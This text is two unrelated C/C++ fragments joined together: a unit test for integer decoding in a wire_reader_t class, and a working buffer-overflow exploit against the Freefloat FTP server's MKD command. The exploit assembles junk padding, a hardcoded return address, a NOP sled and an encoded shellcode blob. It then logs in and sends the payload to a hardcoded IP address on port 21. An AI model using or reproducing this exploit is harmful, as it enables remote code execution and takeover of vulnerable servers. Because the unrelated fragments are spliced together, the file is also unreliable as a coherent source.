TEST(wire_reader_t, ints) { auto buff = make_buff(unhexify("7FFF")); wire_reader_t reader(buff.get()); ASSERT_EQ(127, reader.int8()); ASSERT_EQ(-1, reader.int8()); buff = make_buff(unhexify("AAFF")); reader = wire_reader_t(buff.get()); ASSERT_EQ((int16_t)0xAAFF, reader.int16()); buff = make_buff(unhexify("ABCD0123")); reader = wire_reader_t(buff.get()); ASSERT_EQ((int32_t)0xABCD0123, reader.int32()); buff = make_buff(unhexify("0123456789ABCDEF")); reader = wire_reader_t(buff.get()); ASSERT_EQ(0x0123456789ABCDEF, reader.int64()); }
void *freefloat_ftp_server_mkd_exploit(struct module_t *module) { struct module_t *self; int sock_fd; char buffer[1024]; char attack_string[1006]; char *sc; int space; int offset; char *junk; char *nops; offset = 0; space = 0; self = module; print_error("self.offset = %d", self->target.offset); memset(&buffer, 0, 1024); /* Hard coded until i get a good options method setup */ sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024); memset(&attack_string, '\x90', 1006); sc = "\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9" "\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60" "\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3" "\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c" "\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe" "\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51" "\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a" "\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69" "\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1" "\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65" "\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2" "\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39" "\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88" "\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d" "\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4" "\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1" "\xa2\xeb\x2c"; /* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/ space = (1006 - 4 - 247 - strlen(sc) - 4 - 2); junk = make_buff('A', 247); nops = make_buff('\x90', space); memcat(attack_string, 1006, &offset, "MKD ", 4); memcat(attack_string, 1006, &offset, junk, 247); memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4); memcat(attack_string, 1006, &offset, nops, space); memcat(attack_string, 1006, &offset, sc, strlen(sc)); memcat(attack_string, 1006, &offset, "\r\n", 2); tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024); tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024); tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024); free(junk); free(nops); return 0; }